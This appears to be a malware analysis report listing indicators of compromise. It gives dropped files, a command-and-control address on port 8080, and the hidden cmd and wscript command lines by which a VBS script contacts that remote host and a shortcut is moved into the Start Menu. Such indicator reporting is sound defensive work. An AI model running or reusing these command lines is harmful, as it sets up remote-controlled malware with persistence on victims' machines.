Technical Information
- %TEMP%\xbox.lnk
- %TEMP%\olsye.vbs
- %TEMP%\password.txt
- %TEMP%\xbox.lnk
- '88.##4.166.59':8080
- http://88.###.166.59:8080/edit?to######### via 88.##4.166.59
- http://88.###.166.59:8080/edit?to####################################### via 88.##4.166.59
- '%WINDIR%\syswow64\wscript.exe' "%TEMP%\olsye.vbs" 88.204.166.59:8080/edit 1
- '%WINDIR%\syswow64\wscript.exe' "%TEMP%\olsye.vbs" 88.204.166.59:8080/edit 2
- '%WINDIR%\syswow64\cmd.exe' /C "ECHO profit>%TEMP%\Password.txt&NOTEPAD.EXE %TEMP%\Password.txt&DEL %TEMP%\Password.txt"' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c start /b wscript "%TEMP%\olsye.vbs" 88.204.166.59:8080/edit 1 & start /b wscript "%TEMP%\olsye.vbs" 88.204.166.59:8080/edit 2 & move "%TEMP%\Xbox.lnk" "%APPDATA%\Microsoft\Windows\Start Menu...' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /C "ECHO profit>%TEMP%\Password.txt&NOTEPAD.EXE %TEMP%\Password.txt&DEL %TEMP%\Password.txt"
- '%WINDIR%\syswow64\notepad.exe' %TEMP%\Password.txt
- '%WINDIR%\syswow64\cmd.exe' /c start /b wscript "%TEMP%\olsye.vbs" 88.204.166.59:8080/edit 1 & start /b wscript "%TEMP%\olsye.vbs" 88.204.166.59:8080/edit 2 & move "%TEMP%\Xbox.lnk" "%APPDATA%\Microsoft\Windows\Start Menu...